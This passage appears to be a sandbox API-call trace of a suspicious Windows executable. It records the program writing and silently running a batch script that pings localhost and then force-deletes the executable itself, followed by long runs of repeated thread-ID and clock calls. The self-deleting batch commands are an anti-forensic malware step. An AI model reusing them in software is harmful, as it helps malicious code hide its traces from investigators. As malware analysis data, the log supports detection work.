returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xd9c) returned 0xb8 [0112.834] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0112.834] ResumeThread (hThread=0xb8) returned 0x1 [0112.834] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0113.093] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0113.093] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0113.093] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0113.094] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0113.094] LockResource (hResData=0x5187d4) returned 0x5187d4 [0113.094] FreeResource (hResData=0x5187d4) returned 0 [0113.094] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0113.094] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0113.094] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0113.094] LockResource (hResData=0x50d64c) returned 0x50d64c [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0113.094] FreeResource (hResData=0x50d64c) returned 0 [0113.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0113.094] GetCurrentThreadId () returned 0xd84 [0113.094] GetCurrentThreadId () returned 0xd84 [0113.094] GetCurrentThreadId () returned 0xd84 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0113.094] GetTickCount () returned 0x27167 [0113.094] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=16988313437) returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="1畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="A畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="4畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="q畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="O畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="2畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="R畔﮴\x12\x1c翻") returned 1 [0113.094] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="H畔﮴\x12\x1c翻") returned 1 [0113.094] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0113.094] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0113.094] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe") returned 0x30 [0113.094] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0113.094] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0113.094] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0113.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0113.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0113.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0113.095] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0113.096] CloseHandle (hObject=0xe8) returned 1 [0113.096] GetCurrentThreadId () returned 0xd84 [0113.096] GetCurrentThreadId () returned 0xd84 [0113.096] GetCurrentThreadId () returned 0xd84 [0113.097] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xdc4, dwThreadId=0xdc8)) returned 1 [0113.110] CloseHandle (hObject=0xec) returned 1 [0113.110] CloseHandle (hObject=0xe8) returned 1 [0113.110] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.110] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] GetCurrentThreadId () returned 0xd84 [0113.111] WSACleanup () returned 0 [0113.457] FreeLibrary (hLibModule=0x77380000) returned 1 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentProcess () returned 0xffffffff [0113.457] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0113.457] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] ResetEvent (hEvent=0x88) returned 1 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] ResetEvent (hEvent=0x88) returned 1 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.457] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] CloseHandle (hObject=0x88) returned 1 [0113.458] CloseHandle (hObject=0x8c) returned 1 [0113.458] CloseHandle (hObject=0x84) returned 1 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetCurrentThreadId () returned 0xd84 [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.458] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x333)) [0113.459] GetLocalTime (in: lpSystemTime=0x12fc1c | out: 